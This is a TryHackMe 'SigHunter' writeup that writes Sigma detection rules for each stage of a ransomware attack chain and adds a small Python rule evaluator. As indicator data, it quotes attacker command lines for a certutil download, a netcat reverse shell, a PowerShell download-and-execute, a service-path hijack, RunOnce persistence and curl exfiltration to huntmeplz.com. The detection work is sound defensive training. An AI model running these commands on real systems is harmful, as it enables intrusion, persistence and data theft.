TryHackMe SigHunter WriteUp
Initial Information
- 1st week of work, ransomware incident concluded
- Threat mitigated successfully by Incident Responders
Attack Chain
- Execution of malicious HTML Application (HTA) payload from a phishing link.
- Execution of Certutil tool to download Netcat binary.
- Netcat execution to establish a reverse shell.
- Enumeration of privilege escalation vectors through PowerUp.ps1
- Abused service modification privileges to achieve System privileges.
- Collected sensitive data by archiving via 7-zip.
- Exfiltrated sensitive data through cURL binary.
- Executed ransomware with huntme as the file extension.
| Attack Technique | Indicators of Compromise |
| --- | --- |
| HTA payload | Parent Image: chrome.exe; Image: mshta.exe; Command Line: C:\Windows\SysWOW64\mshta.exe C:\Users\victim\Downloads\update.hta |
| Certutil Download | Image: certutil.exe; Command Line: certutil -urlcache -split -f http://huntmeplz.com/ransom.exe ransom.exe |
| Netcat Reverse Shell | Image: nc.exe; Command Line: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe; MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38 |
| PowerUp Enumeration | Image: powershell.exe; Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;" |
| Service Binary Modification | Image: sc.exe; Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe" |
| RunOnce Persistence | Image: reg.exe; Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe" |
| 7-zip Collection | Image: 7z.exe; Command Line: 7z a exfil.zip * -p |
| cURL Exfiltration | Image: curl.exe; Command Line: curl -d @exfil.zip http://huntmeplz.com:8080/ |
| Ransomware File Encryption | Image: ransom.exe; Target Filename: *.huntme |
| Attack Technique | Required Detection Fields |
| --- | --- |
| HTA payload | EventID, ParentImage, Image |
| Certutil Download | EventID, Image, CommandLine |
| Netcat Reverse Shell | EventID, Image, CommandLine, Hashes |
| PowerUp Enumeration | EventID, Image, CommandLine |
| Service Binary Modification | EventID, Image, CommandLine |
| RunOnce Persistence | EventID, Image, CommandLine |
| 7-zip Collection | EventID, Image, CommandLine |
| cURL Exfiltration | EventID, Image, CommandLine |
| Ransomware File Encryption | EventID, TargetFilename |
For the following challenges we will only display the code that is relevant to our changes.
Challenge #1
We have been informed that the Image is mshta.exe, the ParentImage is chrome.exe, and that we also need to pull the EventID field.
To do this we can use the contains modifier, like so:
detection:
    selection:
        Image|contains: 'mshta.exe' # Checks the Image field for mshta.exe
        ParentImage|contains: 'chrome.exe' # Checks the ParentImage field for chrome.exe
    condition: selection
fields:
    - EventID # Returns the EventID field with each match (fields is a top-level list in Sigma)
Challenge #2
Up next we will again focus on detection and fields. In this case we know the following:
- Image: Certutil.exe
- Command Line requirements:
    - certutil
    - -urlcache # Forces certutil to ignore the currently existing cache and grab a new copy of the file
    - -split # Splits embedded ASN.1 elements and saves them to files, allowing for the capture of embedded malicious payloads
    - -f # Specifies the URL and the file name to download
To write our required sigma rules we will do the following:
detection:
    selection:
        Image|contains: 'certutil.exe'
        CommandLine|contains|all:
            - 'certutil'
            - '-urlcache'
            - '-split'
            - '-f'
    condition: selection
fields:
    - EventID
Challenge #3
Repetitive, I know, but this is what we're looking for: the Netcat reverse shell.
We know the following:
- Image: nc.exe
- CommandLine: C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe
- Hashes: MD5 Hash: 523613A7B9DFA398CBD5EBD2DD0F4F38
We need to remember that we are checking for the -e flag on nc.exe; however, since the file may have entered the system via a different route, we match its hash in a separate selection.
See the code below:
detection:
    selectionNC: # Checks for netcat running a
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|contains: '\nc.exe' # Checks that the process being run is nc.exe
        CommandLine|contains: ' -e ' # Checks whether netcat was told to execute a program after connecting; on a true positive this hands a command prompt to the attacker
    selectionHASH: # Searches for the MD5 hash from the IoC table, so the same file is caught regardless of its name or path
        Hashes|contains: '523613A7B9DFA398CBD5EBD2DD0F4F38'
    condition: selectionNC or selectionHASH # Ensures the rule triggers on either the hash or the nc.exe -e event
Challenge #4
PowerUp Enumeration runs a PowerShell script that enumerates privilege escalation vectors.
We are provided the following knowledge for this:
EventID: 1
Image: powershell.exe
Command Line: powershell "iex(new-object net.webclient).downloadstring('http://huntmeplz.com/PowerUp.ps1'); Invoke-AllChecks;"
detection:
    selection:
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|endswith: 'powershell.exe' # Searches for PowerShell being run
        CommandLine|contains|all:
            - 'iex' # Invoke-Expression, which runs commands and expressions on the local computer
            - 'downloadstring' # Downloads a file or script as a string, which the preceding iex then runs
            - 'Invoke-AllChecks' # Runs all of PowerUp's checks
            - 'PowerUp' # A script used to enumerate different privilege escalation vectors
    condition: selection # Uses the previously created selection
Challenge #5
Service Binary Modification abuses a service running with too-high privileges, whose configuration can be changed, to gain System privileges.
What we know:
EventID: 1
Image: sc.exe
Command Line: sc.exe config SNMPTRAP binPath= "C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe"
detection:
    selection:
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|endswith: 'sc.exe' # The Service Control utility
        CommandLine|contains|all:
            - 'sc.exe' # The application being called is Service Control
            - ' -e ' # The execute flag carried inside the new binPath, passed along to the reverse-shell binary
            - ' config ' # Modifies the value of a service's entries
            - ' binPath= ' # Sets the service's binary path to the malicious executable
    condition: selection # Uses the selection above as the detection logic
Challenge #6
RunOnce Persistence allows an attacker to set up persistence on the system and/or network.
What we know:
EventID: 1
Image: reg.exe
Command Line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v MicrosoftUpdate /t REG_SZ /d "C:\Windows\System32\cmdd.exe"
detection:
    selection:
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|endswith: 'reg.exe' # The reg.exe command-line registry tool is being run
        CommandLine|contains|all:
            - " add " # Adds a new registry key/value to the registry
            - "RunOnce" # Looks for the RunOnce key, whose entries run a program once at the next logon
    condition: selection # Chooses the selection listed above as the detection rule
Challenge #7
7-Zip collection is the step that begins the exfiltration process, where the attacker collects the data into an archive.
What we have:
- EventID: 1
- Image: 7z.exe
- Command Line: 7z a exfil.zip * -p
detection:
    selection:
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|endswith: '7z.exe' # The 7-Zip process used to archive and compress the data
        CommandLine|contains|all:
            - ' a ' # The add-to-archive command, applied to the files named later in the command
            - ' * ' # Selects all files
            - '.zip' # The output is a compressed zip archive
            - ' -p' # Sets a password on the archive, in this case most likely blank
    condition: selection
Challenge #8
cURL Exfiltration is the extraction step that takes place after the data has been archived. We need to look for the file being pushed up to a website.
What we have for information:
EventID: 1
Image: curl.exe
CommandLine: curl -d @exfil.zip http://huntmeplz.com:8080/
detection:
    selection:
        EventID: 1 # Sysmon Event ID 1, process creation
        Image|endswith: 'curl.exe' # The cURL command-line application
        CommandLine|contains|all:
            - 'curl ' # The curl command itself
            - ' -d ' # The -d flag sends data as a POST request, which can move exfiltrated data to a specific website
            - ' @' # Following -d, @ names the file whose contents are sent to the website
            - '.zip ' # If all the other parts match, this confirms the file being sent is an archive
    condition: selection # Action to be taken; condition supports operators such as or, and, not
Challenge #9
The ransomware file-encryption step encrypts all files on the system and renames them with the extension .huntme.
What we know:
EventID: 11
TargetFilename: *.huntme
detection:
    selection:
        EventID: 11 # Sysmon Event ID 11, file creation
        TargetFilename|endswith: '.huntme' # Looks for files the program has renamed to end with the extension .huntme
    condition: selection
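To see how these selection and condition blocks actually evaluate against Sysmon events, here is a small Python evaluator (an added example, not code from the room or from any Sigma backend) that runs the Challenge 3 and Challenge 9 rules over constructed events; the event records, including the renamed-binary case, are assumptions made for the demo.

```python
"""Minimal evaluator for the Sigma detection blocks built in this writeup (added example, not part
of the room or any Sigma backend): contains, contains|all, endswith, equality, and 'or'/'and' conditions."""

def _match(modifiers, expected, actual):
    """Apply one field's modifiers; Sigma string matching is case-insensitive."""
    vals = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    a = str(actual).lower()
    if "contains" in modifiers:
        hits = [v in a for v in vals]
        return all(hits) if "all" in modifiers else any(hits)
    if "endswith" in modifiers:
        return any(a.endswith(v) for v in vals)
    return a in vals  # no modifier: exact match against the listed value(s)

def selection_matches(selection, event):
    """Every 'Field|modifier: value' entry in a selection must hold (AND)."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        if field not in event or not _match(modifiers, expected, event[field]):
            return False
    return True

def rule_matches(detection, event):
    """Condition 'a or b and c' is an OR of AND-clauses (no parentheses needed here)."""
    results = {n: selection_matches(s, event) for n, s in detection.items() if n != "condition"}
    return any(all(results[t.strip()] for t in clause.split(" and "))
               for clause in detection["condition"].split(" or "))

# Challenge 3 and Challenge 9 detection blocks as dicts (YAML comments dropped).
NETCAT_RULE = {
    "selectionNC": {"EventID": 1, "Image|contains": "\\nc.exe", "CommandLine|contains": " -e "},
    "selectionHASH": {"Hashes|contains": "523613A7B9DFA398CBD5EBD2DD0F4F38"},
    "condition": "selectionNC or selectionHASH",
}
RANSOM_RULE = {"selection": {"EventID": 11, "TargetFilename|endswith": ".huntme"}, "condition": "selection"}

# Constructed Sysmon-style events for the demo (not real telemetry).
EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Local\Temp\nc.exe",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\nc.exe huntmeplz.com 4444 -e cmd.exe",
     "Hashes": "MD5=523613A7B9DFA398CBD5EBD2DD0F4F38"},
    {"EventID": 1, "Image": r"C:\Tools\svc.exe", "CommandLine": "svc.exe -l -p 4444",
     "Hashes": "MD5=523613a7b9dfa398cbd5ebd2dd0f4f38"},  # assumed renamed nc.exe: only the hash hits
    {"EventID": 11, "Image": r"C:\Users\victim\Downloads\ransom.exe",
     "TargetFilename": r"C:\Users\victim\Documents\report.docx.huntme"},
]

def matching_indexes(rule, events):
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]  # positions the rule fires on
```

The second event shows why the hash selection is kept separate: the process name and command line no longer match, yet the rule still fires.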